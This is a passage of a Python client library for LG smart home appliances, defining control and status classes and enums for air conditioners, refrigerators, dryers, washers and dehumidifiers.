        """Get an inverse mapping from Celsius to Fahrenheit.
        Just as unbelievably, this is not exactly the inverse of the
        `f2c` map. There are a few values in this reverse mapping that
        are not in the other.
        """
        mapping = self.model.value('TempCelToFah').options
        out = {}
        for c, f in mapping.items():
            try:
                c_num = int(c)
            except ValueError:
                # Some Celsius keys are non-integral (e.g. half degrees).
                c_num = float(c)
            out[c_num] = f
        return out
    def set_celsius(self, c):
        """Set the device's target temperature in Celsius degrees.
        """
        self._set_control('TempCfg', c)
    def set_fahrenheit(self, f):
        """Set the device's target temperature in Fahrenheit degrees.
        """
        self.set_celsius(self.f2c[f])
    def set_on(self, is_on):
        """Turn on or off the device (according to a boolean).
        """
        op = ACOp.ALL_ON if is_on else ACOp.OFF
        op_value = self.model.enum_value('Operation', op.value)
        self._set_control('Operation', op_value)
    def set_mode(self, mode):
        """Set the device's operating mode to an `OpMode` value.
        """
        mode_value = self.model.enum_value('OpMode', mode.value)
        self._set_control('OpMode', mode_value)
    def set_windstrength(self, mode):
        """Set the device's fan speed to an `ACWindstrength` value.
        """
        windstrength_value = self.model.enum_value('WindStrength', mode.value)
        self._set_control('WindStrength', windstrength_value)
    def set_wind_leftright(self, mode):
        """Set the horizontal (left/right) vane swing mode."""
        wdir_value = self.model.enum_value('WDirLeftRight', mode.value)
        self._set_control('WDirLeftRight', wdir_value)
    def set_wdirvstep(self, mode):
        # Setting the vertical vane step also clears PowerSave and Jet
        # in the same control request.
        self._set_control_ac_wdirvstep('WDirVStep',int(mode.value), 'PowerSave', 0, 'Jet', 0)
    def set_airclean(self, is_on):
        """Turn the air-clean feature on or off (boolean)."""
        mode = AIRCLEAN.ON if is_on else AIRCLEAN.OFF
        mode_value = self.model.enum_value('AirClean', mode.value)
        self._set_control('AirClean', mode_value)
    def set_etc_mode(self, name, is_on):
        """Toggle the simple @ON/@OFF control called `name`."""
        mode = ACETCMODE.ON if is_on else ACETCMODE.OFF
        mode_value = self.model.enum_value(name, mode.value)
        self._set_control(name, mode_value)
    def set_sleep_time(self, sleeptime):
        """Set the sleep timer; `sleeptime` is sent untranslated."""
        self._set_control('SleepTime', sleeptime)
    def get_filter_state(self):
        """Get information about the filter."""
        return self._get_config('Filter')
    def get_mfilter_state(self):
        """Get information about the "MFilter" (not sure what this is).
        """
        return self._get_config('MFilter')
    def get_energy_target(self):
        """Get the configured energy target data."""
        return self._get_config('EnergyDesiredValue')
    def get_light(self):
        """Get a Boolean indicating whether the display light is on."""
        value = self._get_control('DisplayControl')
        return value == '0' # Seems backwards, but isn't.
    def get_volume(self):
        """Get the speaker volume level."""
        value = self._get_control('SpkVolume')
        return int(value)
    def monitor_start(self):
        """Start monitoring the device's status."""
        self.mon = Monitor(self.client.session, self.device.id)
        self.mon.start()
    def monitor_stop(self):
        """Stop monitoring the device's status."""
        self.mon.stop()
    def delete_permission(self):
        # Release the server-side monitoring permission.
        self._delete_permission()
    def get_outdoor_weather(self, area):
        """Fetch outdoor weather data for the given `area` code."""
        data = self.client.session.get_outdoor_weather(area)
        return data
    def get_energy_usage_day(self):
        """Energy usage for today (a single-day window)."""
        sDate = datetime.today().strftime("%Y%m%d")
        eDate = sDate
        value = self._get_power_data(sDate, eDate)
        return value
    def get_energy_usage_week(self):
        """Energy usage for the current Sunday-through-Saturday week.

        NOTE(review): on Sundays (weekday() == 6) this window becomes
        the *previous* week -- confirm that is intended.
        """
        weekday = datetime.today().weekday()
        startdate = datetime.today() + timedelta(days=-(weekday+1))
        enddate = datetime.today() + timedelta(days=(6-(weekday+1)))
        sDate = datetime.date(startdate).strftime("%Y%m%d")
        eDate = datetime.date(enddate).strftime("%Y%m%d")
        value = self._get_power_data(sDate, eDate)
        return value
    def get_energy_usage_month(self):
        """Energy usage from the 1st of the current month through today."""
        # NOTE: `weekday` is computed but unused here.
        weekday = datetime.today().weekday()
        startdate = datetime.today().replace(day=1)
        sDate = datetime.date(startdate).strftime("%Y%m%d")
        eDate = datetime.today().strftime("%Y%m%d")
        value = self._get_power_data(sDate, eDate)
        return value
    def get_outtotalinstantpower(self):
        """Read the 'OutTotalInstantPower' config value."""
        value = self._get_config('OutTotalInstantPower')
        return value['OutTotalInstantPower']
    def get_inoutinstantpower(self):
        """Read the 'InOutInstantPower' config value."""
        value = self._get_config('InOutInstantPower')
        return value['InOutInstantPower']
    def poll(self):
        """Poll the device's current state.
        Monitoring must be started first with `monitor_start`. Return
        either an `ACStatus` object or `None` if the status is not yet
        available.
        """
        data = self.mon.poll()
        if data:
            res = self.model.decode_monitor(data)
            """
            with open('/config/wideq/hvac_polled_data.json','w', encoding="utf-8") as dumpfile:
                json.dump(res, dumpfile, ensure_ascii=False, indent="\t")
            """
            return ACStatus(self, res)
        else:
            return None
class ACStatus(object):
    """Higher-level information about an AC device's current status.

    Wraps the decoded monitoring dictionary (`data`) of an `ACDevice`
    (`ac`) and exposes typed, friendly views of the raw values.
    """
    def __init__(self, ac, data):
        self.ac = ac
        self.data = data

    @staticmethod
    def _str_to_num(s):
        """Convert a string to either an `int` or a `float`.

        Troublingly, the API likes values like "18", without a trailing
        ".0", for whole numbers. So we use `int`s for integers and
        `float`s for non-whole numbers.
        """
        f = float(s)
        if f == int(f):
            return int(f)
        else:
            return f

    @property
    def is_on(self):
        """Whether the device is powered on (any side, for dual units)."""
        op = ACOp(self.lookup_enum('Operation'))
        return op != ACOp.OFF

    @property
    def temp_cur_c(self):
        """Current temperature in Celsius."""
        return self._str_to_num(self.data['TempCur'])

    @property
    def temp_cur_f(self):
        """Current temperature in Fahrenheit (via the model's LUT)."""
        return self.ac.c2f[self.temp_cur_c]

    @property
    def temp_cfg_c(self):
        """Configured target temperature in Celsius."""
        return self._str_to_num(self.data['TempCfg'])

    @property
    def temp_cfg_f(self):
        """Configured target temperature in Fahrenheit (via the LUT)."""
        return self.ac.c2f[self.temp_cfg_c]

    def lookup_enum(self, key):
        """Translate the raw value for `key` into its enum label."""
        return self.ac.model.enum_name(key, self.data[key])

    @property
    def model_type(self):
        # `ModelInfo.model_type` is a property, not a method; the
        # previous `model_type()` call raised "TypeError: 'str' object
        # is not callable" at runtime.
        return self.ac.model.model_type

    @property
    def support_oplist(self):
        """Names of the operation modes this model supports."""
        dict_support_opmode = self.ac.model.option_item('SupportOpMode')
        support_opmode = []
        for option in dict_support_opmode.values():
            support_opmode.append(ACMode(option).name)
        return support_opmode

    @property
    def support_windmode(self):
        """Names of the wind modes this model supports."""
        dict_support_windmode = self.ac.model.option_item('SupportWindMode')
        support_windmode = []
        for option in dict_support_windmode.values():
            support_windmode.append(ACMode(option).name)
        return support_windmode

    @property
    def support_fanlist(self):
        """Names of the fan strengths this model supports."""
        dict_support_fanmode = self.ac.model.option_item('SupportWindStrength')
        support_fanmode = []
        for option in dict_support_fanmode.values():
            support_fanmode.append(ACWindstrength(option).name)
        return support_fanmode

    @property
    def support_swingmode(self):
        """Names of the swing (wind direction) modes this model supports."""
        dict_support_swingmode = self.ac.model.option_item('SupportWindDir')
        support_swingmode = []
        for option in dict_support_swingmode.values():
            support_swingmode.append(ACSwingMode(option).name)
        return support_swingmode

    @property
    def support_pacmode(self):
        """Names of the auxiliary (PAC) modes this model supports."""
        dict_support_pacmode = self.ac.model.option_item('SupportPACMode')
        support_pacmode = []
        for option in dict_support_pacmode.values():
            support_pacmode.append(ACPACMode(option).name)
        return support_pacmode

    @property
    def support_reservemode(self):
        """Names of the timer/reserve modes this model supports."""
        dict_support_reservemode = self.ac.model.option_item('SupportReserve')
        support_reservemode = []
        for option in dict_support_reservemode.values():
            support_reservemode.append(ACReserveMode(option).name)
        return support_reservemode

    @property
    def mode(self):
        """The current operation mode, as an `ACMode`."""
        return ACMode(self.lookup_enum('OpMode'))

    @property
    def windstrength_state(self):
        return ACWindstrength(self.lookup_enum('WindStrength'))

    @property
    def wdirleftright_state(self):
        return WDIRLEFTRIGHT(self.lookup_enum('WDirLeftRight'))

    @property
    def wdirupdown_state(self):
        return ACETCMODE(self.lookup_enum('WDirUpDown'))

    @property
    def airclean_state(self):
        return AIRCLEAN(self.lookup_enum('AirClean'))

    @property
    def wdirvstep_state(self):
        # Raw (untranslated) value; standard vane-step encoding.
        return WDIRVSTEP(self.data['WDirVStep'])

    @property
    def fourvain_wdirvstep_state(self):
        # Raw (untranslated) value; four-vane models use this encoding.
        return FOURVAIN_WDIRVSTEP(self.data['WDirVStep'])

    @property
    def sac_airclean_state(self):
        # System ACs report AirClean as a plain @ON/@OFF control.
        return ACETCMODE(self.lookup_enum('AirClean'))

    @property
    def icevalley_state(self):
        return ACETCMODE(self.lookup_enum('IceValley'))

    @property
    def longpower_state(self):
        return ACETCMODE(self.lookup_enum('FlowLongPower'))

    @property
    def autodry_state(self):
        return ACETCMODE(self.lookup_enum('AutoDry'))

    @property
    def smartcare_state(self):
        return ACETCMODE(self.lookup_enum('SmartCare'))

    @property
    def sensormon_state(self):
        return ACETCMODE(self.lookup_enum('SensorMon'))

    @property
    def powersave_state(self):
        return ACETCMODE(self.lookup_enum('PowerSave'))

    @property
    def jet_state(self):
        return ACETCMODE(self.lookup_enum('Jet'))

    @property
    def humidity(self):
        return self.data['SensorHumidity']

    @property
    def sensorpm1(self):
        return self.data['SensorPM1']

    @property
    def sensorpm2(self):
        return self.data['SensorPM2']

    @property
    def sensorpm10(self):
        return self.data['SensorPM10']

    @property
    def sleeptime(self):
        return self.data['SleepTime']

    @property
    def total_air_polution(self):
        # APTOTALAIRPOLUTION is defined elsewhere in this module.
        return APTOTALAIRPOLUTION(self.data['TotalAirPolution'])

    @property
    def air_polution(self):
        # APSMELL is defined elsewhere in this module.
        return APSMELL(self.data['AirPolution'])
"""------------------for Refrigerator"""
class ICEPLUS(enum.Enum):
    """State of the refrigerator's Ice Plus (rapid freeze) feature."""
    OFF = "@CP_OFF_EN_W"
    ON = "@CP_ON_EN_W"
    ICE_PLUS = "@RE_TERM_ICE_PLUS_W"
    ICE_PLUS_FREEZE = "@RE_MAIN_SPEED_FREEZE_TERM_W"
    ICE_PLUS_OFF = "@CP_TERM_OFF_KO_W"
class FRESHAIRFILTER(enum.Enum):
    """State of the refrigerator's fresh-air filter / smart-care."""
    OFF = "@CP_TERM_OFF_KO_W"
    AUTO = "@RE_STATE_FRESH_AIR_FILTER_MODE_AUTO_W"
    POWER = "@RE_STATE_FRESH_AIR_FILTER_MODE_POWER_W"
    REPLACE_FILTER = "@RE_STATE_REPLACE_FILTER_W"
    SMARTCARE_ON = "@RE_STATE_SMART_SMART_CARE_ON"
    SMARTCARE_OFF = "@RE_STATE_SMART_SMART_CARE_OFF"
    SMARTCARE_WAIT = "@RE_STATE_SMART_SMART_CARE_WAIT"
class SMARTSAVING(enum.Enum):
    """The refrigerator's smart-saving operating mode."""
    OFF = "@CP_TERM_USE_NOT_W"
    NIGHT = "@RE_SMARTSAVING_MODE_NIGHT_W"
    CUSTOM = "@RE_SMARTSAVING_MODE_CUSTOM_W"
class RefDevice(Device):
    """Higher-level operations on a refrigerator device."""
    def set_reftemp(self, temp):
        """Set the refrigerator temperature.

        `temp` is a friendly label; it is translated through the
        model's 'TempRefrigerator_C' enum before being sent.
        """
        temp_value = self.model.enum_value('TempRefrigerator_C', temp)
        self._set_control('RETM', temp_value)
    def set_freezertemp(self, temp):
        """Set the freezer temperature.
        """
        temp_value = self.model.enum_value('TempFreezer_C', temp)
        self._set_control('REFT', temp_value)
    def set_iceplus(self, mode):
        """Set the device's operating mode to an `ICEPLUS` value.
        """
        iceplus_value = self.model.enum_value('IcePlus', mode.value)
        self._set_control('REIP', iceplus_value)
    def set_freshairfilter(self, mode):
        """Set the device's operating mode to a `FRESHAIRFILTER` value.
        """
        freshairfilter_value = self.model.enum_value('FreshAirFilter', mode.value)
        self._set_control('REHF', freshairfilter_value)
    def set_activesaving(self, value):
        # `value` is sent untranslated.
        self._set_control('REAS', value)
    def monitor_start(self):
        """Start monitoring the device's status."""
        self.mon = Monitor(self.client.session, self.device.id)
        self.mon.start()
    def monitor_stop(self):
        """Stop monitoring the device's status."""
        self.mon.stop()
    def delete_permission(self):
        # Release the server-side monitoring permission.
        self._delete_permission()
    def poll(self):
        """Poll the device's current state.
        Monitoring must be started first with `monitor_start`. Return
        either a `RefStatus` object or `None` if the status is not yet
        available.
        """
        data = self.mon.poll()
        if data:
            res = self.model.decode_monitor(data)
            """
            with open('/config/wideq/ref_polled_data.json','w', encoding="utf-8") as dumpfile:
                json.dump(res, dumpfile, ensure_ascii=False, indent="\t")
            """
            return RefStatus(self, res)
        else:
            return None
class RefStatus(object):
    """Higher-level information about a refrigerator's current status.

    Wraps the decoded monitoring dictionary (`data`) of a `RefDevice`
    (`ref`).
    """
    def __init__(self, ref, data):
        self.ref = ref
        self.data = data

    def lookup_enum(self, key):
        """Look up the friendly enum name for `key`'s raw value.

        Falls back to the raw value when the model has no mapping for
        it. (The previous version referenced `value` before assignment
        when `key` was missing from the data, raising
        `UnboundLocalError`; a missing key now raises `KeyError`.)
        """
        value = self.data[key]
        try:
            return self.ref.model.enum_name(key, value)
        except KeyError:
            return value

    def lookup_enum_temp(self, key, value):
        """Translate an already-extracted raw `value` via enum `key`."""
        return self.ref.model.enum_name(key, value)

    @property
    def current_reftemp(self):
        """The fridge temperature, as its '..._C' enum label."""
        temp = self.lookup_enum('TempRefrigerator')
        return self.lookup_enum_temp('TempRefrigerator_C', temp)

    @property
    def current_midtemp(self):
        """The middle compartment temperature, as its '..._C' enum label."""
        temp = self.lookup_enum('TempMiddle')
        return self.lookup_enum_temp('TempMiddle_C', temp)

    @property
    def current_freezertemp(self):
        """The freezer temperature, as its '..._C' enum label."""
        temp = self.lookup_enum('TempFreezer')
        return self.lookup_enum_temp('TempFreezer_C', temp)

    @property
    def iceplus_state(self):
        return ICEPLUS(self.lookup_enum('IcePlus'))

    @property
    def freshairfilter_state(self):
        return FRESHAIRFILTER(self.lookup_enum('FreshAirFilter'))

    @property
    def smartsaving_mode(self):
        return self.lookup_enum('SmartSavingMode')

    @property
    def waterfilter_state(self):
        # NOTE(review): the AttributeError fallback appears to guard
        # models without this enum -- confirm which exception actually
        # occurs in practice. Falsy lookups yield None (implicit).
        try:
            waterfilter = self.lookup_enum('WaterFilterUsedMonth')
        except AttributeError:
            return self.data['WaterFilterUsedMonth']
        if waterfilter:
            return waterfilter

    @property
    def door_state(self):
        return self.lookup_enum('DoorOpenState')

    @property
    def smartsaving_state(self):
        return self.lookup_enum('SmartSavingModeStatus')

    @property
    def locking_state(self):
        return self.lookup_enum('LockingStatus')

    @property
    def activesaving_state(self):
        return self.data['ActiveSavingStatus']
"""------------------for Dryer"""
class DRYERSTATE(enum.Enum):
    """The dryer's machine state."""
    OFF = "@WM_STATE_POWER_OFF_W"
    INITIAL = "@WM_STATE_INITIAL_W"
    RUNNING = "@WM_STATE_RUNNING_W"
    DRYING = "@WM_STATE_DRYING_W"
    COOLING = "@WM_STATE_COOLING_W"
    PAUSE = "@WM_STATE_PAUSE_W"
    END = "@WM_STATE_END_W"
    ERROR = "@WM_STATE_ERROR_W"
    SMART_DIAGNOSIS = "@WM_STATE_SMART_DIAGNOSIS_W"
    WRINKLE_CARE = "@WM_STATE_WRINKLECARE_W"
class DRYERPROCESSSTATE(enum.Enum):
    """The phase within the dryer's currently running program."""
    DETECTING = "@WM_STATE_DETECTING_W"
    STEAM = "@WM_STATE_STEAM_W"
    DRY = "@WM_STATE_DRY_W"
    COOLING = "@WM_STATE_COOLING_W"
    ANTI_CREASE = "@WM_STATE_ANTI_CREASE_W"
    END = "@WM_STATE_END_W"
class DRYLEVEL(enum.Enum):
    """The configured dryness level."""
    DAMP = "@WM_DRY27_DRY_LEVEL_DAMP_W"
    LESS = "@WM_DRY27_DRY_LEVEL_LESS_W"
    NORMAL = "@WM_DRY27_DRY_LEVEL_NORMAL_W"
    MORE = "@WM_DRY27_DRY_LEVEL_MORE_W"
    VERY = "@WM_DRY27_DRY_LEVEL_VERY_W"
class TEMPCONTROL(enum.Enum):
    """The configured drying temperature."""
    ULTRA_LOW = "@WM_DRY27_TEMP_ULTRA_LOW_W"
    LOW = "@WM_DRY27_TEMP_LOW_W"
    MEDIUM = "@WM_DRY27_TEMP_MEDIUM_W"
    MID_HIGH = "@WM_DRY27_TEMP_MID_HIGH_W"
    HIGH = "@WM_DRY27_TEMP_HIGH_W"
class ECOHYBRID(enum.Enum):
    """The dryer's eco-hybrid setting."""
    ECO = "@WM_DRY24_ECO_HYBRID_ECO_W"
    NORMAL = "@WM_DRY24_ECO_HYBRID_NORMAL_W"
    TURBO = "@WM_DRY24_ECO_HYBRID_TURBO_W"
class DRYERERROR(enum.Enum):
    """Error codes a dryer can report."""
    ERROR_DOOR = "@WM_US_DRYER_ERROR_DE_W"
    ERROR_DRAINMOTOR = "@WM_US_DRYER_ERROR_OE_W"
    ERROR_LE1 = "@WM_US_DRYER_ERROR_LE1_W"
    ERROR_TE1 = "@WM_US_DRYER_ERROR_TE1_W"
    ERROR_TE2 = "@WM_US_DRYER_ERROR_TE2_W"
    ERROR_F1 = "@WM_US_DRYER_ERROR_F1_W"
    ERROR_LE2 = "@WM_US_DRYER_ERROR_LE2_W"
    ERROR_AE = "@WM_US_DRYER_ERROR_AE_W"
    ERROR_dE4 = "@WM_WW_FL_ERROR_DE4_W"
    ERROR_NOFILTER = "@WM_US_DRYER_ERROR_NOFILTER_W"
    ERROR_EMPTYWATER = "@WM_US_DRYER_ERROR_EMPTYWATER_W"
    ERROR_CE1 = "@WM_US_DRYER_ERROR_CE1_W"
class DryerDevice(Device):
    """Higher-level operations on a dryer device."""
    def monitor_start(self):
        """Start monitoring the device's status."""
        self.mon = Monitor(self.client.session, self.device.id)
        self.mon.start()
    def monitor_stop(self):
        """Stop monitoring the device's status."""
        self.mon.stop()
    def delete_permission(self):
        # Release the server-side monitoring permission.
        self._delete_permission()
    def poll(self):
        """Poll the device's current state.
        Monitoring must be started first with `monitor_start`. Return
        either a `DryerStatus` object or `None` if the status is not yet
        available.
        """
        data = self.mon.poll()
        if data:
            res = self.model.decode_monitor(data)
            """
            with open('/config/wideq/dryer_polled_data.json','w', encoding="utf-8") as dumpfile:
                json.dump(res, dumpfile, ensure_ascii=False, indent="\t")
            """
            return DryerStatus(self, res)
        else:
            return None
class DryerStatus(object):
    """A snapshot of a dryer's monitored state.

    Wraps the decoded monitoring dictionary for a `DryerDevice` and
    presents friendly, typed views of the raw values.
    """

    def __init__(self, dryer, data):
        self.dryer = dryer
        self.data = data

    def lookup_enum(self, key):
        """Translate the raw value for `key` into its enum label."""
        return self.dryer.model.enum_name(key, self.data[key])

    def lookup_reference(self, key):
        """Translate the raw value for `key` via the model's reference table."""
        return self.dryer.model.reference_name(key, self.data[key])

    def lookup_bit(self, key, index):
        """Return 'ON'/'OFF' for bit `index` of the numeric field `key`."""
        if int(self.data[key]) & (1 << index):
            return 'ON'
        return 'OFF'

    @property
    def is_on(self):
        """Whether the dryer is powered on at all."""
        return self.run_state != DRYERSTATE.OFF

    @property
    def run_state(self):
        """The current machine state."""
        return DRYERSTATE(self.lookup_enum('State'))

    @property
    def pre_state(self):
        """The machine state before the current one."""
        return DRYERSTATE(self.lookup_enum('PreState'))

    @property
    def remaintime_hour(self):
        return self.data['Remain_Time_H']

    @property
    def remaintime_min(self):
        return self.data['Remain_Time_M']

    @property
    def initialtime_hour(self):
        return self.data['Initial_Time_H']

    @property
    def initialtime_min(self):
        return self.data['Initial_Time_M']

    @property
    def reservetime_hour(self):
        return self.data['Reserve_Time_H']

    @property
    def reservetime_min(self):
        return self.data['Reserve_Time_M']

    @property
    def reserveinitialtime_hour(self):
        return self.data['Reserve_Initial_Time_H']

    @property
    def reserveinitialtime_min(self):
        return self.data['Reserve_Initial_Time_M']

    @property
    def current_course(self):
        """The selected course, or 'OFF' when none is set."""
        course = self.lookup_reference('Course')
        return 'OFF' if course == '-' else course

    @property
    def error_state(self):
        """The current error as a `DRYERERROR`, or 'OFF'/'NO_ERROR'."""
        error = self.lookup_reference('Error')
        if error == '-':
            return 'OFF'
        if error == 'No Error':
            return 'NO_ERROR'
        return DRYERERROR(error)

    @property
    def drylevel_state(self):
        """The configured dryness level, or 'OFF' when unset."""
        drylevel = self.lookup_enum('DryLevel')
        return 'OFF' if drylevel == '-' else DRYLEVEL(drylevel)

    @property
    def tempcontrol_state(self):
        """The configured drying temperature, or 'OFF' when unset."""
        tempcontrol = self.lookup_enum('TempControl')
        return 'OFF' if tempcontrol == '-' else TEMPCONTROL(tempcontrol)

    @property
    def ecohybrid_state(self):
        """The eco-hybrid setting, or 'OFF' when unset."""
        ecohybrid = self.lookup_enum('EcoHybrid')
        return 'OFF' if ecohybrid == '-' else ECOHYBRID(ecohybrid)

    @property
    def process_state(self):
        """The phase within the currently running program."""
        return DRYERPROCESSSTATE(self.lookup_enum('ProcessState'))

    @property
    def current_smartcourse(self):
        """The selected smart course, or 'OFF' when none is set."""
        smartcourse = self.lookup_reference('SmartCourse')
        return 'OFF' if smartcourse == '-' else smartcourse

    @property
    def anticrease_state(self):
        return self.lookup_bit('Option1', 1)

    @property
    def childlock_state(self):
        return self.lookup_bit('Option1', 4)

    @property
    def selfcleaning_state(self):
        return self.lookup_bit('Option1', 5)

    @property
    def dampdrybeep_state(self):
        return self.lookup_bit('Option1', 6)

    @property
    def handiron_state(self):
        return self.lookup_bit('Option1', 7)
"""------------------for Washer"""
class WASHERSTATE(enum.Enum):
    """The washer's machine state."""
    OFF = "@WM_STATE_POWER_OFF_W"
    INITIAL = "@WM_STATE_INITIAL_W"
    PAUSE = "@WM_STATE_PAUSE_W"
    RESERVE = "@WM_STATE_RESERVE_W"
    DETECTING = "@WM_STATE_DETECTING_W"
    RUNNING = "@WM_STATE_RUNNING_W"
    RINSING = "@WM_STATE_RINSING_W"
    SPINNING = "@WM_STATE_SPINNING_W"
    SOAK = "@WM_STATE_SOAK_W"
    COMPLETE = "@WM_STATE_COMPLETE_W"
    FIRMWARE = "@WM_STATE_FIRMWARE_W"
    SMART_DIAGNOSIS = "@WM_STATE_SMART_DIAGNOSIS_W"
class WASHERSOILLEVEL(enum.Enum):
    """The configured soil (dirtiness) level."""
    LIGHT = "@WM_OPTION_SOIL_LEVEL_LIGHT_W"
    LIGHT_NORMAL = "@WM_OPTION_SOIL_LEVEL_LIGHT_NORMAL_W"
    NORMAL = "@WM_OPTION_SOIL_LEVEL_NORMAL_W"
    NORMAL_HEAVY = "@WM_OPTION_SOIL_LEVEL_NORMAL_HEAVY_W"
    HEAVY = "@WM_OPTION_SOIL_LEVEL_HEAVY_W"
class WASHERWATERTEMP(enum.Enum):
    """The configured wash water temperature."""
    TAP_COLD = "@WM_OPTION_TEMP_TAP_COLD_W"
    COLD = "@WM_OPTION_TEMP_COLD_W"
    SEMI_WARM = "@WM_OPTION_TEMP_SEMI_WARM_W"
    WARM = "@WM_OPTION_TEMP_WARM_W"
    HOT = "@WM_OPTION_TEMP_HOT_W"
    EXTRA_HOT = "@WM_OPTION_TEMP_EXTRA_HOT_W"
class WASHERSPINSPEED(enum.Enum):
    """The configured spin speed."""
    NO_SELECT = "@WM_OPTION_SPIN_NO_SPIN_W"
    LOW = "@WM_OPTION_SPIN_LOW_W"
    MEDIUM = "@WM_OPTION_SPIN_MEDIUM_W"
    HIGH = "@WM_OPTION_SPIN_HIGH_W"
    EXTRA_HIGH = "@WM_OPTION_SPIN_EXTRA_HIGH_W"
class WASHERRINSECOUNT(enum.Enum):
    """The configured number of rinse cycles."""
    NO_SELECT = "@CP_OFF_EN_W"
    ONE = "@WM_KR_TT27_WD_WIFI_OPTION_RINSECOUNT_1_W"
    TWO = "@WM_KR_TT27_WD_WIFI_OPTION_RINSECOUNT_2_W"
    THREE = "@WM_KR_TT27_WD_WIFI_OPTION_RINSECOUNT_3_W"
    FOUR = "@WM_KR_TT27_WD_WIFI_OPTION_RINSECOUNT_4_W"
    FIVE = "@WM_KR_TT27_WD_WIFI_OPTION_RINSECOUNT_5_W"
class WASHERDRYLEVEL(enum.Enum):
    """The configured drying option for washer-dryer combo units."""
    NO_SELECT = "@WM_TERM_NO_SELECT_W"
    WIND = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_WIND_W"
    TURBO = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_TURBO_W"
    TIME_30 = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_TIME_30_W"
    TIME_60 = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_TIME_60_W"
    TIME_90 = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_TIME_90_W"
    TIME_120 = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_TIME_120_W"
    TIME_150 = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_TIME_150_W"
class WASHERERROR(enum.Enum):
ERROR_dE2 = "@WM_KR_TT27_WD_WIFI_ERROR_DE2"
ERROR_IE = "@WM_KR_TT27_WD_WIFI_ERROR_IE"
ERROR_OE = "@WM_KR_TT27_WD_WIFI_ERROR_OE"
ERROR_UE = "@WM_KR_TT27_WD_WIFI_ERROR_UE"
ERROR_FE = "@WM_KR_TT27_WD_WIFI_ERROR_FE"
ERROR_PE = "@WM_KR_TT27_WD_WIFI_ERROR_PE"
ERROR_tE = "@WM_KR_TT27_WD_WIFI_ERROR_TE"
ERROR_LE = "@WM_KR_TT27_WD_WIFI_ERROR_LE"
ERROR_CE = "@WM_KR_TT27_WD_WIFI_ERROR_CE"
ERROR_dHE = "@WM_KR_TT27_WD_WIFI_ERROR_DHE"
ERROR_PF = "@WM_KR_TT27_WD_WIFI_ERROR_PF"
ERROR_FF = "@WM_KR_TT27_WD_WIFI_ERROR_FF"
ERROR_dCE = "@WM_KR_TT27_WD_WIFI_ERROR_DCE"
ERROR_EE = "@WM_KR_TT27_WD_WIFI_ERROR_EE"
ERROR_PS = "@WM_KR_TT27_WD_WIFI_ERROR_PS"
ERROR_dE1 = "@WM_KR_TT27_WD_WIFI_ERROR_DE1"
ERROR_LOE = "@WM_KR_TT27_WD_WIFI_ERROR_LOE"
class WasherDevice(Device):
def monitor_start(self):
"""Start monitoring the device's status."""
self.mon = Monitor(self.client.session, self.device.id)
self.mon.start()
def monitor_stop(self):
"""Stop monitoring the device's status."""
self.mon.stop()
def delete_permission(self):
self._delete_permission()
def poll(self):
"""Poll the device's current state.
Monitoring must be started first with `monitor_start`. Return
either an `ACStatus` object or `None` if the status is not yet
available.
"""
data = self.mon.poll()
if data:
res = self.model.decode_monitor(data)
"""
with open('/config/wideq/washer_polled_data.json','w', encoding="utf-8") as dumpfile:
json.dump(res, dumpfile, ensure_ascii=False, indent="\t")
"""
return WasherStatus(self, res)
else:
return None
class WasherStatus(object):
def __init__(self, washer, data):
self.washer = washer
self.data = data
def lookup_enum(self, key):
return self.washer.model.enum_name(key, self.data[key])
def lookup_reference(self, key):
return self.washer.model.reference_name(key, self.data[key])
def lookup_bit(self, key, index):
bit_value = int(self.data[key])
bit_index = 2 ** index
mode = bin(bit_value & bit_index)
if mode == bin(0):
return 'OFF'
else:
return 'ON'
@property
def is_on(self):
run_state = WASHERSTATE(self.lookup_enum('State'))
return run_state != WASHERSTATE.OFF
@property
def run_state(self):
return WASHERSTATE(self.lookup_enum('State'))
@property
def pre_state(self):
return WASHERSTATE(self.lookup_enum('PreState'))
@property
def remaintime_hour(self):
return self.data['Remain_Time_H']
@property
def remaintime_min(self):
return self.data['Remain_Time_M']
@property
def initialtime_hour(self):
return self.data['Initial_Time_H']
@property
def initialtime_min(self):
return self.data['Initial_Time_M']
@property
def reservetime_hour(self):
return self.data['Reserve_Time_H']
@property
def reservetime_min(self):
return self.data['Reserve_Time_M']
@property
def current_course(self):
course = self.lookup_reference('Course')
if course == '-':
return 'OFF'
else:
return course
@property
def error_state(self):
error = self.lookup_reference('Error')
if error == '-':
return 'OFF'
elif error == 'No Error':
return 'NO_ERROR'
else:
return WASHERERROR(error)
@property
def wash_option_state(self):
soillevel = self.lookup_enum('SoilLevel')
if soillevel == '-':
return 'OFF'
return WASHERSOILLEVEL(soillevel)
@property
def spin_option_state(self):
spinspeed = self.lookup_enum('SpinSpeed')
if spinspeed == '-':
return 'OFF'
return WASHERSPINSPEED(spinspeed)
@property
def water_temp_option_state(self):
water_temp = self.lookup_enum('WTemp')
if water_temp == '-':
return 'OFF'
return WASHERWATERTEMP(water_temp)
@property
def rinsecount_option_state(self):
rinsecount = self.lookup_enum('RinseCount')
if rinsecount == '-':
return 'OFF'
return WASHERRINSECOUNT(rinsecount)
@property
def drylevel_option_state(self):
drylevel = self.lookup_enum('DryLevel')
if drylevel == '-':
return 'OFF'
return WASHERDRYLEVEL(drylevel)
@property
def current_smartcourse(self):
smartcourse = self.lookup_reference('SmartCourse')
if smartcourse == '-':
return 'OFF'
else:
return smartcourse
@property
def freshcare_state(self):
return self.lookup_bit('Option1', 1)
@property
def childlock_state(self):
return self.lookup_bit('Option1', 3)
@property
def steam_state(self):
return self.lookup_bit('Option1', 4)
@property
def turboshot_state(self):
return self.lookup_bit('Option2', 7)
@property
def tubclean_count(self):
return self.data['TCLCount']
@property
def load_level(self):
return self.lookup_enum('LoadLevel')
"""------------------for Dehumidifier"""
class DEHUMOperation(enum.Enum):
ON = "@operation_on"
OFF = "@operation_off"
class DEHUMOPMode(enum.Enum):
SMART_DEHUM = "@AP_MAIN_MID_OPMODE_SMART_DEHUM_W"
FAST_DEHUM = "@AP_MAIN_MID_OPMODE_FAST_DEHUM_W"
SILENT_DEHUM = "@AP_MAIN_MID_OPMODE_CILENT_DEHUM_W"
CONCENTRATION_DRY = "@AP_MAIN_MID_OPMODE_CONCENTRATION_DRY_W"
